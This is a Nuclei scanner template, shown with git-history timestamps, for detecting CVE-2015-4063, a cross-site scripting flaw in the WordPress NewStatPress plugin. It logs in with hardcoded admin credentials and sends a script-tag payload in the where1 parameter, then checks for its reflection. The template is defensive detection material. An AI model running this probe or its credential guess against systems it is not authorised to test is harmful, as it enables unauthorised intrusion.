nuclei-templates/http/cves/2015/CVE-2015-4063.yaml

52 lines
2.2 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2015-4063
info:
name: NewStatPress <0.9.9 - Cross-Site Scripting
2023-03-05 13:42:10 +00:00
author: r3Y3r53
2023-07-11 19:49:27 +00:00
severity: low
2023-03-05 13:42:10 +00:00
description: |
WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
2023-09-06 13:22:34 +00:00
remediation: Update to plugin version 0.9.9 or latest.
2023-03-05 13:42:10 +00:00
reference:
- https://packetstormsecurity.com/files/132038/
- https://wordpress.org/plugins/newstatpress/
- http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-4063
2023-07-15 16:29:17 +00:00
- https://wordpress.org/plugins/newstatpress/changelog/
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N
cvss-score: 3.5
cve-id: CVE-2015-4063
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.04016
epss-percentile: 0.91867
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 13:22:34 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: newstatpress_project
product: newstatpress
2023-09-06 13:22:34 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=admin&pwd=admin123&wp-submit=Log+In
- |
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"
condition: and
# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950